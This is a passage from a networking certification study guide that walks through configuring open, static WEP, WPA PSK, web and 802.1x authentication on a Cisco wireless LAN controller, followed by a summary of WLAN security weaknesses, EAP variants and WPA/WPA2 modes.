Configuring Encryption and Authentication on Lightweight Access Points

In this section, you will learn how to navigate through the GUI of a WLC (Cisco WLC2006, specifically) to configure encryption and authentication on a lightweight AP (Cisco AP1020, specifically). The specific tasks shown are configuring open authentication, static WEP authentication, WPA with PSK, web authentication, and 802.1x authentication.

Open Authentication

Open authentication means that you are interested neither in authenticating the client/user nor in encrypting the data exchanged between the wireless client and the network. This type of setting is often used in public places or hotspots such as airports, hotels, and lobbies for guest wireless access (to the Internet, for example). To set up open authentication, open a web browser page to your WLAN controller (using its name or IP address), log on, and click on the WLAN option on the main toolbar.

After you are on the WLAN page, you can set up a new wireless LAN by clicking on New or change the settings on an existing WLAN by clicking on Edit beside the name of an existing WLAN. The default method for authentication is 802.1x. This protects your WLAN against accidentally setting it up with open authentication. Figure 9-7 shows the page that you will see if you choose to modify an existing WLAN by clicking on Edit.

Figure 9-7 Configuring Open Authentication

Configuring Open Authentication


As you can see in Figure 9-7, on the right side of the WLAN > Edit page is a drop-down list with the title Layer 2 Security under the Security Policies section. To set up for open authentication, you must select None from the drop-down list. (Remember that the default is 802.1x.)

Static WEP Authentication

To set up a WLAN for static WEP authentication, you must go to the WLAN > Edit page. On the right side of this page, in the Security Policies section, select Static WEP from the Layer 2 Security drop-down list. After you select this option, the Static WEP options are displayed on the bottom of this page. (See Figure 9-8.)

Figure 9-8 Configuring Static WEP Authentication

Configuring Static WEP Authentication

As you can see in Figure 9-8, a section with the Static WEP Parameters heading is displayed on the bottom of the WLAN > Edit page. You can configure up to four keys using the Key Index drop-down list. For each key, you can select its size from the Key Size drop-down list. In the Encryption Key box, you can type the value for each key. For each key, you can select ASCII or HEX as the key format from the Key Format drop-down list. Note that each WLAN is associated to only one key index; therefore, with a maximum of four key indexes available from the dropdown list, you can set up a maximum of four wireless LANs with the Static WEP option.

WPA Preshared Key

WPA PSK authentication is also configured on the WLAN > Edit page. From the Layer 2 Security drop-down list under the Security Policies section, you must select WPA (or WPA1 + WPA2 depending on your software version). If you select the WPA1 + WPA2 (or WPA) option, the appropriate fields for setting up the WPA parameters are displayed on the bottom of the WLAN > Edit page, as shown in Figure 9-9.

Figure 9-9 Configuring WPA PSK

Configuring WPA PSK

NOTE Please note that in the figure that is in the ONT courseware, WPA is chosen from the Layer 2 Security drop-down list, and the bottom of the page has a WPA Parameters section instead. The reason for the discrepancy between Figure 9-9 of this topic and the figure that is in the ONT courseware is the software version difference on the wireless controller.

To set up for WPA PSK, under the WPA1 + WPA2 Parameters section, you must select the WPA1 Policy check box. For WPA1 encryption, you can choose either the AES or TKIP check box. Next, from the Auth Key Mgmt drop-down list, you must select PSK. Finally, on the last line in the WPA1 + WPA2 Parameters section, you must type the PSK in the long text box provided. Note the PSK format drop-down list allows you to specify the format of the PSK as either ASCII or HEX.

NOTE Again, the figure in the ONT courseware shows that after you select WPA from the Layer 2 Security drop-down list, a WPA Parameters section displays on the bottom of the WLAN > Edit page. Within that section, you are asked to click and enable a Pre-Shared Key check box and then type a PSK in the long text box provided.

Web Authentication

To authenticate users through a web browser interface, you must configure web authentication and its corresponding parameters. If a user has a web browser open (HTTP) and attempts to access the WLAN, he is presented a login page. The login page is customizable; you can configure the logos and the text on the login page. Web authentication is usually used for guest access; the data exchanged between the wireless client and the AP is not encrypted, nor is there MIC or per-packet authentication. Therefore, the client is open to attacks such as packet modification and hijacking. As of the writing of this topic, the web authentication feature is available on Cisco 4400 WLCs and Cisco Catalyst 6500 Wireless Service Modules (WiSM), but it is not available on Cisco 2000 WLCs or Cisco Integrated Services Routers wireless LAN controller modules. With web authentication, the maximum simultaneous authentication limit is 21; the total local web authentication user limit is 2500.

To set up web authentication, you must navigate to the WLAN > Edit page. Under Security Policies in the Layer 3 security section, you will find a Web Policy check box that you must enable (see Figure 9-10).

Figure 9-10 Configuring Web Authentication

Configuring Web Authentication

Below the Web Policy check box, you must choose between Authentication or Passthrough options. If you select Authentication, the users are prompted for a username and password when they attempt to access the network. The username and password are verified against the internal user database of WLC; if no match is found, the username and password are verified from an external RADIUS server if one is configured. If Passthrough is selected, the user is not prompted for a username and password; however, if the Email Input check box (which is beneath the Passthrough option) is enabled, the users are prompted for their e-mail address. The last option you have under Layer 3 security is selecting an access list from the Preauthentication ACL dropdown list to be used against the traffic exchanged between the wireless client and the WLC.

To customize the login page for web authentication, you must click the Security option in the main toolbar. From the security options listed on the left side of this page, click the Web Login Page option. You are then presented with a page similar to the one shown in Figure 9-11.

NOTE In the ONT courseware, either because of a WLC hardware/software difference or because of typing error, you are asked to go to Management > Web Login Page instead of Security > Web Login Page.

Figure 9-11 Customizing the Web Login Page

Customizing the Web Login Page

As shown in Figure 9-11, on the Web Login Page, you have three choices for Web Authentication Type: Internal (Default), Customized (Downloaded), and External (Redirect to external server). If you choose the external or customized types, you must then enter a URL in the Redirect URL after login box below. Otherwise, if you want the default authentication page of the WLC, select the Internal (Default) option. The other options you have are selecting to show or hide the Cisco logo, and entering a headline and a message.Wireless Network," and an example for the message would be "Access is only offered to authorized users. Please enter your username and password."

802.1x Authentication

802.1x authentication is the default setting. To change the setting from other options back to 802.1x, you must navigate to the WLAN > Edit page and select 802.1x from the Layer 2 Security drop-down list under the Security Policies section. After you select this option, on the bottom of the WLAN > Edit page, a section with the 802.1x Parameters heading is displayed (see Figure 9-12).

Figure 9-12 802.1xAuthentication

802.1xAuthentication

Under the 802.1x Parameters section, you are presented with a drop-down list, giving you a choice of None, 40 bits, 104 bits, and 128 bits WEP encryption for 802.11 data encryption. Note that 802.11 standards only support 40/64-bit and 104/128-bit keys; 128/152-bit keys are only supported by 802.11i, WPA, and WPA2-compliant clients. It is also important to note that Microsoft Windows XP clients only support 40-bit and 104-bit WEP keys.

From the Layer 2 Security drop-down list under the Security Policies section, you can also select WPA1 + WPA2. As stated earlier, on some hardware/software, WPA and WPA2 might be presented as separate options. If you intend to use WPA with 802.1x, select the WPA1 + WPA2 (or WPA) option. In response, the WLAN > Edit page displays the WPA1 + WPA2 Parameters section on the bottom, as shown in Figure 9-13.

Figure 9-13 WPA with 802.1x

WPA with 802.1x

Next, under the WPA1 + WPA2 Parameters section, enable the WPA1 Policy check box and choose the AES or TKIP check box for WPA1 encryption. Finally, make sure you choose 802.1x (not PSK) from the Auth Key Mgmt drop-down list so that the RADIUS server performs authentication.

To configure a WLAN for WPA2 security with dynamic keys, from the Layer 2 Security dropdown list under the Security Policies section, select WPA1 + WPA2. (On some hardware/ software, WPA and WPA2 might be presented as separate options.) In response, the WLAN > Edit page displays the WPA1 + WPA2 Parameters section on the bottom, as shown in Figure 9-14.

Figure 9-14 WPA2 with Dynamic Keys

WPA2 with Dynamic Keys

Next, under the WPA1 + WPA2 Parameters section, enable the WPA2 Policy check box and choose the AES or TKIP check box for WPA2 encryption. Finally, make sure you choose 802.1x (not PSK) from the Auth Key Mgmt drop-down list so that the RADIUS server performs authentication.

If you enable both the WPA1 Policy and the WPA2 Policy check boxes, you are effectively setting up your WLAN for WPA compatibility mode. WPA compatibility mode supports both WPA and WPA2 clients and allows them to use the same SSID. Selecting both AES and TKIP for WPA2 Encryption allows support of legacy hardware that does support WPA2 but not AES.

NOTE In the ONT courseware, it shows that you can select WPA2 from the Layer 2 Security drop-down list under the Security Policies section (instead of WPA1 + WPA2); this is because of a hardware/software difference. Next, the ONT courseware states that a section titled WPA2 Parameters appears on the bottom of the WLAN > Edit page. In the WPA2 Parameters section, you are then presented with the choice of enabling any of the following three options:

■ WPA2 Compatibility Mode

■ Allow WPA2 TKIP Clients

■ Pre-Shared Key

This note has been added so that you are prepared for a possible question in the certification exam, should it be based on software/hardware variances.

Foundation Summary

The "Foundation Summary" is a collection of information that provides a convenient review of many key concepts in this topic. If you are already comfortable with the topics in this topic, this summary can help you recall a few details. If you just read this topic, this review should help solidify some key facts. If you are doing your final preparation before the exam, the information in this section is a convenient way to review the day before the exam.

Following are the traditional wireless local-area network (WLAN) security issues:

■ Reliance on Service Set Identifier (SSID) as a security feature

■ Vulnerability to rogue access points (AP)

■ Reliance on MAC filters as a security feature

■ Usage of Wired Equivalent Privacy (WEP) Following are the shortcomings of WEP:

■ The distribution of WEP keys to clients is not scalable.

■ WEP keys can be deducted if enough data is captured (even with IV).

■ WEP is vulnerable to dictionary attacks.

■ WEP does not provide protection against rogue APs. The main features and benefits of 802.1x/EAP are as follows:

■ Usage of RADIUS server for AAA centralized authentication

■ Mutual authentication between the client and the authentication server

■ Ability to use 802.1x with multiple encryption algorithms, such as Advanced Encryption Standard (AES), wireless protected access (WPA), Temporal Key Integrity Protocol (TKIP), and WEP

■ Without user intervention, the ability to use dynamic (instead of static) WEP keys

■ Support of roaming

Following are the required components for 802.1x authentication:

■ EAP-capable client (the supplicant)

■ 802.1x-capable AP (the authenticator)

■ EAP-capable RADIUS server (the authentication server)

Table 9-3 displays important features of the main EAP variants discussed in this topic.

Table 9-3 Comparison of Main EAP Variants

Feature

Cisco LEAP

EAP-FAST

EAP-TLS

PEAP-GTC

PEAP-MSCHAPv2

User authentication database and server

Windows NT domains, Active Directory

Windows NT domains, Active Directory, LDAP (limited)

OTP, LDAP, Novell NDS, Windows NT domains, Active Directory

OTP, LDAP, Novell NDS, Windows NT domains, Active Directory

Windows NT domains, Active Directory

Requires server certificates

No

No

Yes

Yes

Yes

Requires client certificates

No

No

Yes

No

No

Able to use single sign-on using Windows login

Yes

Yes

Yes

No

Yes

Works with fast secure roaming

Yes

Yes

No

No

No

Works with WPA and WPA2

Yes

Yes

Yes

Yes

Yes

Following are the most important features/components of WPA:

■ Authenticated key management—WPA performs authentication using either IEEE 802.1x or preshared key (PSK) prior to the key management phase.

■ Unicast and broadcast key management—After successful user authentication, message integrity and encryption keys are derived, distributed, validated, and stored on the client and the AP.

■ Utilization of TKIP and MIC— Temporal Key Integrity Protocol (TKIP) and Message Integrity Check (MIC) are both elements of the WPA standard and they secure a system against WEP vulnerabilities such as intrusive attacks.

■ Initialization vector space expansion—WPA provides per-packet keying (PPK) via initialization vector (IV) hashing and broadcast key rotation. The IV is expanded from 24 bits (as in 802.11 WEP) to 48 bits.

The main shortcomings and issues of WPA are as follows:

■ Even though WPA uses TKIP, which is an enhancement to 802.11 WEP, it relies on the RC4 encryption. (RC4 has known shortcomings.)

■ WPA requires AP firmware support, software driver support for wireless cards, and operating system support (or a supplicant client). It is not guaranteed that the manufacturers of all these components that you own will release upgrades to support WPA.

■ WPA is susceptible to a specific denial of service (DoS attack); if an AP receives two successive packets with bad MICs, the AP shuts down the basic service set for one minute.

■ If small and noncomplex PSKs are used instead of 802.11i or EAP, an attacker who performs dictionary attacks on captured traffic can discover them.

Following are the key features of WPA2:

■ It uses 802.1x for authentication. (It also supports PSKs.)

■ It uses a similar method of key distribution and key renewal to WPA.

■ It supports Proactive Key Caching (PKC).

■ It uses Intrusion Detection System (IDS).

WPA and WPA2 have two modes: Enterprise mode and Personal mode. Each mode has encryption support and user authentication. Table 9-4 displays the authentication and encryption methods that WPA and WPA2 use in Enterprise and Personal modes.

Table 9-4 WPA/WPA2 Enterprise and Personal Modes

Mode

WPA

WPA2

Enterprise mode

Authentication: IEEE 802.1x/EAP Encryption: TKIP/MIC

Authentication: IEEE 802.1x/EAP Encryption: AES-CCMP

Personal mode

Authentication: PSK Encryption: TKIP/MIC

Authentication: PSK Encryption: AES-CCMP

Following are some of the issues that an enterprise must consider while evaluating and deciding to migrate to WPA2:

■ The wireless client (supplicant) must have a WPA2 driver that is EAP compatible.

■ The RADIUS server must support EAP.

■ Because WPA2 is more CPU-intensive than WPA (mostly due to usage of AES encryption), hardware upgrades are often required (rather than just a firmware upgrade).

■ Some older devices cannot be upgraded, so they might need to be replaced.

To set up or change the authentication and encryption settings for your WLANS (LWAPs), open a web browser page to your WLAN controller (using its name or IP address), log on, and click on the WLAN option on the main toolbar. Next, click on Edit for an existing WLAN; the WLAN > Edit page appears. The Security Policies section on the WLAN > Edit page allows you to set up Layer 2 and Layer 3 security settings.

Next post:

Previous post: